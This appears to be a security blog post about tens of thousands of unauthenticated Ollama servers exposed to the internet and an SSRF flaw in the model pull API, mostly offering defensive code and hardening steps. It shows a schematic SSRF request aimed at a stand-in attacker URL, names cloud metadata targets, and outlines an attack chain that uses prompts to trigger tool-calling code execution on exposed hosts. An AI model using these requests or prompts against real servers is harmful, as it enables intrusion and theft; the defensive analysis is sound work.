field note

The Local LLM Revolution Is a 175,000-Server Security Disaster

CVE-2026-5530 and the Ollama exposure crisis reveal that the 'run AI locally' movement has been deployed with the security hygiene of a mid-2000s PHP forum.


Researchers found 175,000 publicly exposed Ollama servers across 130 countries. Around half of those have tool calling enabled. Nobody asked for this, but here we are.

Ollama ships with no authentication by default. Out of the box, the server binds to 127.0.0.1:11434. If you're moving fast and set OLLAMA_HOST=0.0.0.0, it listens on every interface instead. The OLLAMA_HOST environment variable is a footgun so obvious it should come with a warning label. Spin up a quick LLM demo on a VPS, forward that port, and you've just added one more node to a botnet-sized pool of open AI inference endpoints. Not intentionally. Just frictionlessly. The path of least resistance leads directly to the public internet.
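Checking which side of that line a machine is on can be done mechanically. The sketch below classifies an OLLAMA_HOST-style value as either loopback-only or reachable from other machines. It is a simplified approximation, not Ollama's own parser, and `bind_host` and `binds_beyond_loopback` are hypothetical names. An unset value maps to the documented 127.0.0.1 default. In Go, an empty host in `host:port` (for example `:11434`) means every interface, so the sketch treats that case as exposed.

```python
import ipaddress
import os


def bind_host(value: str) -> str:
    """Extract the host part of an OLLAMA_HOST-style value.

    Simplified approximation (hypothetical helper, not Ollama's parser):
    handles "host", "host:port", "[ipv6]:port", bare IPv6, and an optional
    "scheme://" prefix. An unset or empty value maps to 127.0.0.1.
    """
    value = value.strip()
    if "://" in value:
        value = value.split("://", 1)[1]
    value = value.split("/", 1)[0]
    if not value:
        return "127.0.0.1"
    if value.startswith("["):            # "[::1]:11434" or "[::]"
        return value[1:].split("]", 1)[0]
    if value.count(":") == 1:            # "host:port"; ":11434" yields ""
        return value.split(":", 1)[0]
    return value                         # bare hostname, IPv4, or IPv6


def binds_beyond_loopback(value: str) -> bool:
    """True if a server bound this way is reachable from other machines."""
    host = bind_host(value)
    if host == "":                       # empty host in Go means every interface
        return True
    if host == "localhost":
        return False
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True                      # unknown hostname: assume reachable


if __name__ == "__main__":
    setting = os.environ.get("OLLAMA_HOST", "")
    verdict = "EXPOSED beyond loopback" if binds_beyond_loopback(setting) else "loopback only"
    print(f"OLLAMA_HOST={setting!r}: {verdict}")
```

A LAN address such as 192.168.1.10 also counts as exposed here. That is deliberate: once a port is forwarded, "reachable from the LAN" is one router rule away from "reachable from everywhere".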

CVE-2026-5530: The SSRF That Compounds the Footgun

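SentinelOne's vulnerability database published details on CVE-2026-5530 last week. It's a server-side request forgery in Ollama's Model Pull API, specifically in server/download.go. The flaw lets a remote attacker craft requests that force the Ollama server to make HTTP requests to arbitrary destinations of the attacker's choosing. The advisory describes the attacker as authenticated. On a default install with no authentication layer, though, that bar is any client that can reach port 11434. Schematically, the request looks something like this: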

POST /api/pull HTTP/1.1
Host: <target-ollama-server:11434>
Content-Type: application/json

{"name": "model", "insecure": true, "url": "http://attacker-controlled-internal-service:8080/evil"}

The Ollama server runs with the privileges of whatever user launched it, and it will happily fetch that URL. From there, an attacker can:

  1. probe internal microservices
  2. read cloud instance metadata endpoints (169.254.169.254 on AWS, metadata.google.internal on GCP)
  3. port-scan internal networks
  4. use the Ollama instance as a jump host into otherwise isolated network segments
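The defensive counterpart is an outbound-request guard. Before a server fetches a URL on a client's behalf, it refuses any destination that is not publicly routable. Below is a minimal sketch that assumes nothing about how Ollama's own fix (if any) is implemented. `is_blocked_ip` and `is_safe_fetch_target` are hypothetical names. A check-then-fetch guard like this is racy against DNS rebinding. A production version should connect to the exact address it validated and re-run the check on every redirect hop.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def is_blocked_ip(ip: str) -> bool:
    """True for any address that is not publicly routable.

    Covers loopback, RFC 1918 ranges, link-local (169.254.0.0/16, where
    AWS and GCP serve instance metadata), and other special-purpose blocks.
    """
    addr = ipaddress.ip_address(ip.split("%", 1)[0])  # drop any IPv6 zone id
    return not addr.is_global or addr.is_multicast


def is_safe_fetch_target(url: str) -> bool:
    """Hypothetical pre-flight check for a server-side fetch of `url`."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False  # no file://, gopher://, or host-less URLs
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
        infos = socket.getaddrinfo(parts.hostname, port, proto=socket.IPPROTO_TCP)
    except (ValueError, socket.gaierror):  # malformed port or unresolvable host
        return False
    # Every resolved address must be public; one internal answer is enough to refuse.
    return bool(infos) and not any(is_blocked_ip(info[4][0]) for info in infos)
```

Checking every resolved address, not just the first, matters. An attacker-controlled DNS name can return both a public and an internal record.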

The CVSS score for this is medium, which tells you everything about how the industry weights SSRF. It’s a useful primitive in a system that shouldn’t exist in this configuration in the first place.

What Tool Calling Actually Means Here

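Around 87,000 of those 175,000 exposed instances have tool calling enabled. Tool calling is Ollama's mechanism for letting a model request external functions. The model emits a structured call, and the application wired to it executes that call, whether it's a shell command or an HTTP request to an arbitrary endpoint. Once an agent framework runs those calls automatically, tool calling is, by design, a code execution primitive wrapped in natural language.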
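Where the code actually executes matters for defense. In Ollama's chat API, the model returns tool calls as data: a `tool_calls` list on the response message, where each entry carries a function `name` and `arguments`. The application receiving them decides what runs. The sketch below assumes that response shape and uses a hypothetical `get_weather` tool. Anything not on an explicit allowlist is refused, so a prompt that talks the model into requesting a shell command gets nothing.

```python
import json


def get_weather(city: str) -> str:
    """Hypothetical read-only tool; stands in for whatever you actually expose."""
    return f"Sunny in {city}"


# The allowlist is the security boundary: only these callables can ever run.
# Nothing here shells out or fetches arbitrary URLs.
ALLOWED_TOOLS = {"get_weather": get_weather}


def dispatch_tool_calls(response: dict) -> list[str]:
    """Execute allowlisted tool calls from a chat response; refuse everything else.

    Assumes the response shape {"message": {"tool_calls": [{"function":
    {"name": ..., "arguments": {...}}}]}}.
    """
    results = []
    for call in response.get("message", {}).get("tool_calls") or []:
        fn = call.get("function", {})
        name = fn.get("name")
        args = fn.get("arguments") or {}
        if isinstance(args, str):  # tolerate arguments serialized as JSON text
            args = json.loads(args)
        tool = ALLOWED_TOOLS.get(name)
        if tool is None:
            results.append(f"refused: {name!r} is not allowlisted")
            continue
        try:
            results.append(tool(**args))
        except TypeError:  # wrong or extra argument names
            results.append(f"refused: bad arguments for {name!r}")
    return results
```

The allowlist does nothing about a network-exposed Ollama port. It only limits what a successful prompt injection can make your own application do.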

The attack surface looks like this:

  1. Attacker finds an exposed Ollama endpoint (Shodan, Censys, or just a port scan of cloud ranges)
  2. No authentication required. The API is open.
  3. Attacker sends a prompt that triggers tool calling, or exploits the SSRF to proxy requests through the Ollama host
  4. Whatever tools the model invokes run on the host with the permissions of the process that executes them
  5. Attacker now has arbitrary code execution, a pivot point into the internal network, and GPU resources for whatever they want
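Step 1 works just as well for defenders. The sketch below asks a host you own whether it answers Ollama's `/api/version` endpoint without credentials. A JSON reply containing a `version` field from a public address means you are part of the 175,000. The function name is hypothetical. The probe bypasses any configured HTTP proxy so that it measures direct reachability, and it handles IPv4 addresses and hostnames only. Only point it at machines you are authorized to test.

```python
import json
import urllib.error
import urllib.request


def answers_unauthenticated(host: str, port: int = 11434, timeout: float = 3.0) -> bool:
    """Return True if http://host:port/api/version replies without credentials.

    Hypothetical self-audit helper. IPv4 addresses and hostnames only.
    """
    url = f"http://{host}:{port}/api/version"
    # An empty ProxyHandler disables environment proxies: we want a direct probe.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    try:
        with opener.open(url, timeout=timeout) as resp:
            body = json.loads(resp.read().decode("utf-8"))
    except (urllib.error.URLError, OSError, ValueError):
        # Refused, timed out, rejected (HTTPError, e.g. 401), or not JSON.
        return False
    return isinstance(body, dict) and "version" in body


if __name__ == "__main__":
    import sys

    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    verdict = "OPEN" if answers_unauthenticated(target) else "no unauthenticated answer"
    print(f"{target}: {verdict}")
```

Run it from a machine outside your network against your public address. An answer from inside the network only proves LAN reachability.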

This is not theoretical. NCC Group documented a DNS rebinding attack against Ollama (CVE-2024-28224) in 2024. Wiz Research documented remote code execution via path traversal in model manifests (CVE-2024-37032, "Probllama"). It was most severe in Docker deployments, where the server runs as root. The pattern has been consistent. Ollama was built for local inference on a developer's machine. The industry then stapled it onto cloud infrastructure without applying any of the controls that would normally accompany a networked service with code execution capabilities.

This Is the 2026 Equivalent of Exposed Docker APIs

If you were paying attention in 2015, you watched the same thing happen with Docker. The daemon API, when exposed without TLS client certificates, allowed trivial host compromise: start a privileged container with the host filesystem mounted and you own the machine. Real attackers scanned for it. Botnets formed. Scripts ran. The documentation said not to do it. The tutorials did it anyway because it was faster.

The same sequence is playing out with Ollama. The tool is excellent for local inference. The deployment patterns emerging around it are a remake of the Docker era, complete with the same genre of security incident waiting to happen. The difference is that Ollama tool calling gives you code execution at a higher abstraction layer. It has a more capable model behind it and runs on GPU hardware that costs far more to operate than a typical container host.

The Fix Is Not Complicated

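# Do not expose Ollama to the internet. Ever.
# If you need remote access, put it behind a reverse proxy with auth:
# nginx with basic auth, Cloudflare Access, Tailscale, anything.

# At minimum, bind explicitly to localhost (this is also the default).
# Export it so `ollama serve` sees it; under systemd, set
# Environment="OLLAMA_HOST=127.0.0.1:11434" in the service unit instead.
export OLLAMA_HOST=127.0.0.1:11434
ollama serve

# If you must run networked, terminate TLS at the proxy and firewall the port.
# ufw matches rules in order: allow the LAN first, then deny everyone else.
sudo ufw allow from 192.168.1.0/24 to any port 11434 proto tcp
sudo ufw deny 11434/tcp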

The hard part is not the implementation. The hard part is that the developer-experience incentives point toward the insecure configuration. "It works on my machine" scales to "it works on my VPS", which scales to "it works exposed to 4 billion internet addresses." Nobody set out to build 175,000 open AI compute nodes. It happened through a series of reasonable-seeming decisions made by different people at different times.

What This Means for the Local LLM Movement

The pitch for local inference has always been privacy, cost control, and avoiding API rate limits. Those are real benefits. But the security model of “your data never leaves your machine” only holds if your machine is not a networked endpoint that an attacker can reach and manipulate.

The Ollama ecosystem has been so focused on capability improvements (larger context windows, better quantization, new model support) that infrastructure security has been an afterthought. The ollama binary itself does not ship with any authentication layer. There is no mutual TLS guidance in the README. The default bind behavior assumes a world where the machine running Ollama is the machine using Ollama.

That world is gone. The 175,000 exposed servers are proof. The local LLM movement needs to decide whether it is building personal inference tools or deploying networked AI infrastructure. These are different problems with different security requirements. Treating a code-execution-enabled inference API as a personal tool that happens to be internet-accessible is how you get a 175,000-server security incident.

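The vulnerability is in server/download.go. The exposure is on every cloud provider, every VPS, every forwarded home connection where someone wanted to test Llama 3 from their phone. The mitigation for the exposure is OLLAMA_HOST=127.0.0.1. The SSRF itself still needs a fixed Ollama release, because binding to localhost only narrows who can reach it.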

If you are running Ollama on anything other than localhost, assume it is compromised and rebuild it with proper network controls. The 175,000-server sample size tells you what the threat landscape looks like.